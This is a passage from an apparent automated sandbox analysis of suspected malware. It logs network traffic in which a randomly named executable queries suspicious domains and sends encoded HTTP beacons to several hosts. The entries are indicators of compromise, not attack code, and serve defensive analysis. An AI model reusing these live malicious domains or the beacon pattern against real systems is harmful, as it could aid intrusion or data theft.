                                                          Dec 3, 2024 23:29:03.503820896 CET5002180192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:03.628834009 CET8050021172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:29:03.628912926 CET5002180192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:03.638772011 CET5002180192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:03.762891054 CET8050021172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:29:04.923130989 CET8050021172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:29:04.924285889 CET8050021172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:29:04.924338102 CET5002180192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:04.925817013 CET5002180192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:05.050777912 CET8050021172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:29:10.354626894 CET5003080192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:10.478467941 CET8050030172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:10.478549957 CET5003080192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:10.493513107 CET5003080192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:10.617264032 CET8050030172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:12.000622988 CET5003080192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:12.024136066 CET8050030172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:12.024195910 CET5003080192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:12.024811029 CET8050030172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:12.024852991 CET5003080192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:12.124420881 CET8050030172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:12.124514103 CET5003080192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:13.019694090 CET5003180192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:13.143379927 CET8050031172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:13.143480062 CET5003180192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:13.158278942 CET5003180192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:13.282134056 CET8050031172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:14.600403070 CET8050031172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:14.601933002 CET8050031172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:14.601977110 CET5003180192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:14.672527075 CET5003180192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:15.691128969 CET5003280192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:15.814838886 CET8050032172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:15.814996958 CET5003280192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:15.830732107 CET5003280192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:15.954546928 CET8050032172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:15.954718113 CET8050032172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:17.308475971 CET8050032172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:17.310004950 CET8050032172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:17.310070992 CET5003280192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:17.310090065 CET8050032172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:17.310138941 CET5003280192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:17.344353914 CET5003280192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:18.362864017 CET5003380192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:18.487595081 CET8050033172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:18.487723112 CET5003380192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:18.496896029 CET5003380192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:18.620675087 CET8050033172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:19.933777094 CET8050033172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:19.934082985 CET8050033172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:19.934138060 CET5003380192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:19.937572956 CET5003380192.168.2.6172.67.167.146
                                                          Dec 3, 2024 23:29:20.061336040 CET8050033172.67.167.146192.168.2.6
                                                          Dec 3, 2024 23:29:25.484128952 CET5003480192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:25.608001947 CET8050034154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:25.608077049 CET5003480192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:25.623222113 CET5003480192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:25.746995926 CET8050034154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:27.125540018 CET5003480192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:27.207071066 CET8050034154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:27.207199097 CET5003480192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:27.207734108 CET8050034154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:27.207833052 CET5003480192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:27.249778986 CET8050034154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:27.249831915 CET5003480192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:28.145584106 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:28.271981001 CET8050036154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:28.272073984 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:28.286525011 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:28.412664890 CET8050036154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:29.797405005 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:29.834085941 CET8050036154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:29.834101915 CET8050036154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:29.834151030 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:29.834173918 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:29.921499968 CET8050036154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:29.921554089 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:30.816011906 CET5003780192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:30.941046953 CET8050037154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:30.941360950 CET5003780192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:30.957195997 CET5003780192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:31.081681967 CET8050037154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:31.082694054 CET8050037154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:32.471179008 CET5003780192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:32.595621109 CET8050037154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:32.595690012 CET5003780192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:33.487848043 CET5003880192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:33.612696886 CET8050038154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:33.612798929 CET5003880192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:33.621771097 CET5003880192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:33.746406078 CET8050038154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:35.274543047 CET8050038154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:35.274557114 CET8050038154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:35.274693012 CET5003880192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:35.277264118 CET5003880192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:35.401048899 CET8050038154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:40.905572891 CET5003980192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:41.029295921 CET8050039209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:41.029381990 CET5003980192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:41.043953896 CET5003980192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:41.167892933 CET8050039209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:42.352122068 CET8050039209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:42.352313042 CET8050039209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:42.352365017 CET5003980192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:42.547301054 CET5003980192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:43.565731049 CET5004080192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:43.689469099 CET8050040209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:43.689601898 CET5004080192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:43.703735113 CET5004080192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:43.827627897 CET8050040209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:45.015003920 CET8050040209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:45.015117884 CET8050040209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:45.015364885 CET5004080192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:45.219392061 CET5004080192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:46.381758928 CET5004180192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:46.505497932 CET8050041209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:46.505671978 CET5004180192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:46.521192074 CET5004180192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:46.644969940 CET8050041209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:46.645065069 CET8050041209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:47.916810036 CET8050041209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:47.917035103 CET8050041209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:47.917260885 CET5004180192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:48.031620979 CET5004180192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:49.054363012 CET5004280192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:49.178395033 CET8050042209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:49.178474903 CET5004280192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:49.187618017 CET5004280192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:49.311752081 CET8050042209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:50.450774908 CET8050042209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:50.450913906 CET8050042209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:50.452738047 CET5004280192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:50.453579903 CET5004280192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:50.577394962 CET8050042209.74.77.107192.168.2.6

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 3, 2024 23:27:35.730882883 CET5084953192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:27:36.295115948 CET53508491.1.1.1192.168.2.6
                                                          Dec 3, 2024 23:27:52.723567009 CET6142453192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:27:53.411708117 CET53614241.1.1.1192.168.2.6
                                                          Dec 3, 2024 23:28:08.427218914 CET5270053192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:28:09.438735962 CET5270053192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:28:09.483894110 CET53527001.1.1.1192.168.2.6
                                                          Dec 3, 2024 23:28:09.581861019 CET53527001.1.1.1192.168.2.6
                                                          Dec 3, 2024 23:28:24.316839933 CET5720453192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:28:25.314013004 CET5720453192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:28:25.458901882 CET53572041.1.1.1192.168.2.6
                                                          Dec 3, 2024 23:28:25.460133076 CET53572041.1.1.1192.168.2.6
                                                          Dec 3, 2024 23:28:40.078064919 CET6267953192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:28:40.597383976 CET53626791.1.1.1192.168.2.6
                                                          Dec 3, 2024 23:28:55.181200027 CET6423753192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:28:55.497526884 CET53642371.1.1.1192.168.2.6
                                                          Dec 3, 2024 23:29:09.942214012 CET6267953192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:29:10.351916075 CET53626791.1.1.1192.168.2.6
                                                          Dec 3, 2024 23:29:24.941406965 CET4923953192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:29:25.481693029 CET53492391.1.1.1192.168.2.6
                                                          Dec 3, 2024 23:29:40.285471916 CET5748653192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:29:40.903224945 CET53574861.1.1.1192.168.2.6
                                                          Dec 3, 2024 23:29:55.952630043 CET5468453192.168.2.61.1.1.1
                                                          Dec 3, 2024 23:29:56.580615044 CET53546841.1.1.1192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 3, 2024 23:27:35.730882883 CET192.168.2.61.1.1.10x3cfaStandard query (0)www.nb-shenshi.buzzA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:27:52.723567009 CET192.168.2.61.1.1.10xe90fStandard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:08.427218914 CET192.168.2.61.1.1.10xf3c5Standard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:09.438735962 CET192.168.2.61.1.1.10xf3c5Standard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:24.316839933 CET192.168.2.61.1.1.10x4ad5Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:25.314013004 CET192.168.2.61.1.1.10x4ad5Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:40.078064919 CET192.168.2.61.1.1.10xf254Standard query (0)www.amayavp.xyzA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:55.181200027 CET192.168.2.61.1.1.10x6481Standard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:29:09.942214012 CET192.168.2.61.1.1.10x2bd4Standard query (0)www.rgenerousrs.storeA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:29:24.941406965 CET192.168.2.61.1.1.10xfa26Standard query (0)www.t91rl7.proA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:29:40.285471916 CET192.168.2.61.1.1.10x4b80Standard query (0)www.learnwithus.siteA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:29:55.952630043 CET192.168.2.61.1.1.10xc8beStandard query (0)www.cuthethoi.onlineA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 3, 2024 23:27:36.295115948 CET1.1.1.1192.168.2.60x3cfaNo error (0)www.nb-shenshi.buzz161.97.168.245A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:27:53.411708117 CET1.1.1.1192.168.2.60xe90fNo error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 23:27:53.411708117 CET1.1.1.1192.168.2.60xe90fNo error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:27:53.411708117 CET1.1.1.1192.168.2.60xe90fNo error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:27:53.411708117 CET1.1.1.1192.168.2.60xe90fNo error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:27:53.411708117 CET1.1.1.1192.168.2.60xe90fNo error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:09.483894110 CET1.1.1.1192.168.2.60xf3c5No error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:09.581861019 CET1.1.1.1192.168.2.60xf3c5No error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:25.458901882 CET1.1.1.1192.168.2.60x4ad5No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 23:28:25.458901882 CET1.1.1.1192.168.2.60x4ad5No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 23:28:25.458901882 CET1.1.1.1192.168.2.60x4ad5No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:25.460133076 CET1.1.1.1192.168.2.60x4ad5No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 23:28:25.460133076 CET1.1.1.1192.168.2.60x4ad5No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 23:28:25.460133076 CET1.1.1.1192.168.2.60x4ad5No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:40.597383976 CET1.1.1.1192.168.2.60xf254No error (0)www.amayavp.xyz185.27.134.144A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:55.497526884 CET1.1.1.1192.168.2.60x6481No error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:28:55.497526884 CET1.1.1.1192.168.2.60x6481No error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:29:10.351916075 CET1.1.1.1192.168.2.60x2bd4No error (0)www.rgenerousrs.store172.67.167.146A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:29:10.351916075 CET1.1.1.1192.168.2.60x2bd4No error (0)www.rgenerousrs.store104.21.57.248A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:29:25.481693029 CET1.1.1.1192.168.2.60xfa26No error (0)www.t91rl7.pro154.88.22.101A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:29:40.903224945 CET1.1.1.1192.168.2.60x4b80No error (0)www.learnwithus.site209.74.77.107A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 23:29:56.580615044 CET1.1.1.1192.168.2.60xc8beServer failure (2)www.cuthethoi.onlinenonenoneA (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.nb-shenshi.buzz
                                                          • www.laohub10.net
                                                          • www.xcvbj.asia
                                                          • www.soainsaat.xyz
                                                          • www.amayavp.xyz
                                                          • www.vayui.top
                                                          • www.rgenerousrs.store
                                                          • www.t91rl7.pro
                                                          • www.learnwithus.site

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.649808161.97.168.24580768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:27:36.438179016 CET507OUTGET /xxr1/?b6=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.nb-shenshi.buzz
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:27:37.679775000 CET1236INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:27:37 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 2966
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: "66cd104a-b96"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                          Dec 3, 2024 23:27:37.679797888 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                          Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                          Dec 3, 2024 23:27:37.679811001 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                          Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.64984727.124.4.24680768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:27:53.554835081 CET754OUTPOST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 34 36 63 61 31 4d 5a 39 73 73 51 66 6c 58 34 69 6a 2f 61 2b 57 44 44 38 76 72 6e 51 68 2f 4a 59 47 78 75 50 78 63 4b 77 47 55 50
                                                          Data Ascii: b6=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe46ca1MZ9ssQflX4ij/a+WDD8vrnQh/JYGxuPxcKwGUP
                                                          Dec 3, 2024 23:27:54.936975002 CET525INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
